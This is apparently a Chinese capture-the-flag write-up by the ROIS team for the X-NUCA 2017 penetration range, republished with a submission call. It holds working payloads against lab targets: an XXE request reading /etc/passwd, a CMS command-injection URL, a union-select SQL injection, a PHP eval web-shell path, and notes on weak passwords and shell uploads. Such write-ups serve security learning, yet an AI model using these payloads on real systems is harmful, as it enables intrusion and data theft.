独家 | X-NUCA '17第一期靶场渗透赛最佳团队Writeup!

ROIS团队合天网安实验室

点击“合天智汇”关注，学习网安干货

靶场渗透赛

No.1 你喜欢颜文字么| Solved

No.2 让你无语的 md5 | Solved

No.3 Pav1 和 lloowweerrxx.avi | Solved No.4 X-NUCA 2017's Secrets | Solved No.5 Lucky Number Calc | Solved No.6 Hello World | solved

No.8 看视频真嗨皮 | Solved

No.9 The Best Community | Solved

No.11 两只小蜜蜂啊| Solved

No.14 DuomiCMS | Solved

No.16 来一发 flask | Solved

No.18 AContent | Solved: No.21 Freecms | Solved

No.23 找入口 | Solved

No.24 可爱的星星 | Solved

No.25 | Solved

No.1 你喜欢颜文字么| Solved

不知所云的题目

No.2 让你无语的 md5 | Solved

关键字词：一档 CTF 题

Pav1 遇到不会的 md5 很喜欢去百度一下无语的 md5 e5a5dc7404c4e4dad32e4556ac2588b6.xnuca.cn 根据注释提示是 mysql 的字符集问题

猜测都是 admin 的账户查询 admin

根据 https://www.leavesongs.com/PENETRATION/mysql-charset-trick.html

查询 admin%c2

16714f297ee17b13a097a15cd229c947 这个 MD5 有点不同啊，快去 somd5 一下在 https://somd5.com/查询下得到 flag

xnuca{0c7b5781935082833f6487a69d81404b}

No.3 Pav1 和 lloowweerrxx.avi | Solved

CVE-2016-1897

NO.4 X-NUCA 2017's Secrets | Solved

/res/site.war 下载源码 zip 解压 jd-gui 看 class 注册的时候加一个 isActive=1 就能登录

然后现在是要让 isSupaAdministrata=1

参考 http://blog.csdn.net/qq_27446553/article/details/73480823 对象自动绑定拿到

http://a4b359466421ae3aa76a8b116dda3870.xnuca.cn/res/HYGorlL29LtcMCR6GUg23XRM JxVge5F7.js

(function() { alert('xnuca{hbeLMqNuCnohaWTQhxpf5Ep7yMBjcjG3}')

})

No.5 Lucky Number Calc | Solved

xml 注入

POST /ctf1.php HTTP/1.1

Host: f83f119af64fa2b94c37231bbce09678.xnuca.cn Content-Length: 174

Accept: */*

Origin: http://f83f119af64fa2b94c37231bbce09678.xnuca.cn X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8 DNT: 1

Referer: http://f83f119af64fa2b94c37231bbce09678.xnuca.cn/ Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4 Connection: close

<!DOCTYPE results [

<!ENTITY harmless SYSTEM

"php://filter/read=convert.base64-encode/resource=/etc/passwd"

<user>

<name>&harmless;</name>

</user>

/etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:106::/var/run/dbus:/bin/false ntp:x:103:109::/home/ntp:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin

ctf1.php

<?php

$xmldata=file_get_contents("php://input");

#$data=simplexml_load_string($xmldata);

libxml_disable_entity_loader(false);

$dom = new DOMDocument();

$dom->loadXML($xmldata, LIBXML_NOENT | LIBXML_DTDLOAD);

$data = simplexml_import_dom($dom);

$str = $data->name;

if(preg_match("/[\'.,:;*?~`!@#$%^&)(<>{}]|\]|\[|\/|\\\|\"|\|/",$str)){ echo 'Illegal Input';

}else{

$firstnum = ord(substr( $str, 0, 1 ));

$stlen = strlen($str);

$luckynum = ($firstnum * $stlen) % 100;

$res = 'Dear '.$str.', Your Lucky Number is '.$luckynum; echo $res;

}

读取 /etc/hosts

xnuca{N3sSMD165KesSXlyOgwMGTepI2HTJC0b}

No.6 Hello World | solved

http://91101217df5a534c58f8b0e0922e1161.xnuca.cn/.git/config

用工具 dump 下来一个 js 一个 php

js 里密文解出来是 flag is in flag.js

php: discuz 的核心加密解密函数

flag.php

<?php

ini_set("display_errors", "Off"); error_reporting(0);

function encode($b, $c = '', $d = 0) {

$e = 4;

$c = md5($c); //"816302c22ad445a2cb9b7d0a209f2854"

$f = md5(substr($c, 0, 16)); // "832d748a3cad1935ab1d9d18182e9ec9"

$g = md5(substr($c, 16, 16)); // "ac4f2b390bc5f79a1f987ac15cb7f36d"

$h = $e ? ($k == 'DECODE' ? substr($b, 0, $e) : substr(md5(microtime()) , -$e)) : ''; // 3133

$l = $f . md5($f . $h); // "832d748a3cad1935ab1d9d18182e9ec99a6a04e6f4386d374d5e38fcb24f1c9f"

$m = strlen($l); // 64

$b = sprintf('%010d', $d ? $d + time() : 0) . substr(md5($b . $g) , 0, 16) . $b;

$n = strlen($b);

$o = '';

$p = range(0, 255);

$q = array();

for ($r = 0; $r <= 255; $r++) {

$q[$r] = ord($l[$r % $m]);

}

for ($s = $r = 0; $r < 256; $r++) {

$s = ($s + $p[$r] + $q[$r]) % 256;

$t = $p[$r];

$p[$r] = $p[$s];

$p[$s] = $t;

}

for ($u = $s = $r = 0; $r < $n; $r++) {

$u = ($u + 1) % 256;

$s = ($s + $p[$u]) % 256;

$t = $p[$u];

$p[$u] = $p[$s];

$p[$s] = $t;

$o.= chr(ord($b[$r]) ^ ($p[($p[$u] + $p[$s]) % 256]));

}

return $h . str_replace('=', '', base64_encode($o));

}

$c = "flag_1s_n0t_h3re";

$cipher = "3133g8JTV89Ds4oh5k0JRPFijAbc1Qw7HciaZfhsV5lWr+7RM9IAF9SNw9WJMEg";

解出来还是 flag is in flag.js, 这都没卵用

https://gist.github.com/angusty/bcbb64fb6dc47b26674a

手工 dump .git/objects

git cat-file -p f2b45f1e5af6dc1a8607c11e4ddc5fd077276c45 > 1.js git cat-file -p 04bb09bb63fe48e6cab3e1c72a7ef51dda9634b8 > 2.js diff 两个文件

flag{82efc37f1cd5d4636ea7cadcd5a814a2}

No.8 看视频真嗨皮 | Solved

bd314808c1ed529fdba936fdffc5c7ba.xnuca.cn

参考 http://www.bugku.com/thread-28-1-1.html

No.9 The Best Community|Solved

http://a8cb8b3cde7837fb14512b1055e4a275.xnuca.cn

https://www.exploit-db.com/exploits/40756/

No.11 两只小蜜蜂啊| Solved

http://00aa852a37a43db58ac318f0deaef536.xnuca.cn

请在目标入口/writeHere/目录下创建名为 20778565df0d421b539bf4e66fe21738 的文件

https://bbs.ichunqiu.com/thread-12635-1-1.html

http://00aa852a37a43db58ac318f0deaef536.xnuca.cn/admin/login.php 注入?

账号: admin 密码: amdin

/upload/img/201708261723177106.php?a=eval($_POST[q]);

No.14 DuomiCMS | Solved

http://d832106f99c258d75bb16d1873e6c77b.xnuca.cn/ http://3b65cbfdc649746ca312ea65e6e1df95.xnuca.cn/search.php?jq=1);system(dir);//&searchtype=5

命令执行

参考 http://www.lofter.com/tag/duomicms

No.16 来一发 flask | Solved

2bf75b750bb0799fd95dad8ac92f1cb8.xnuca.cn 404 页面服务端模板注入

直接执行代码

No.18 AContent | Solved:

参考 https://www.htbridge.com/advisory/HTB23117 xnuca{Co8n0g5r72a4tul3at2ions!Y0ug0tMe}

No.21 Freecms | Solved

S2-045 工具来一发

No.23 找入口 | Solved

5e7d47186dc0e2520479e9bec3bdcd75.xnuca.cn http://07945fd84fe47a1a2264eb539fed1c1b.xnuca.cn/?/admin

弱密码 admin admin

任意上传个小马

/etc/flag.txt

No.24 可爱的星星 | Solved

5e7d47186dc0e2520479e9bec3bdcd75.xnuca.cn

POST /index.php?_a=do_mail&_m=mod_email HTTP/1.1 Content-Type: application/x-www-form-urlencoded; charset=utf-8 Cookie: PHPSESSID=65676uue8hmaigepggn66pn1l6

Host: 522e52f9f4f81b75b2718ad29ac60c14.xnuca.cn Connection: close

User-Agent: Paw/3.1.2 (Macintosh; OS X/10.12.6) GCDHTTPRequest Content-Length: 112

title=aa&email_s=a&email_m=a&type=a&users=aaaa%27%7Caaa&role%5B%5D=abdc%7D%27+union+select+ 1%2Cuser%28%29%2C3%23

注入得到 admin 密码 1234!@#$ 登录之后上传图片，文件管理中重命名为.php

No.25 | Solved

metinfo 5.3.1 d231646c5c0e4ac216204b5d166e0c56.xnuca.cn

metinfo 参考 https

本文来自：ROIS团队！

别忘了投稿哟！！！

合天公众号开启原创投稿啦！！！

大家有好的技术原创文章。

欢迎投稿至邮箱：edu@heetian.com；

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予100元-500元不等的稿费哟。

有才能的你快来投稿吧！

合天网安实验室

网址 : www.hetianlab.com

电话：4006-123-731

长按图片，据说只有颜值高的人才能识别哦→

点

这里“阅读原文”，查看ROIS团队独家专访

继续滑动看下一个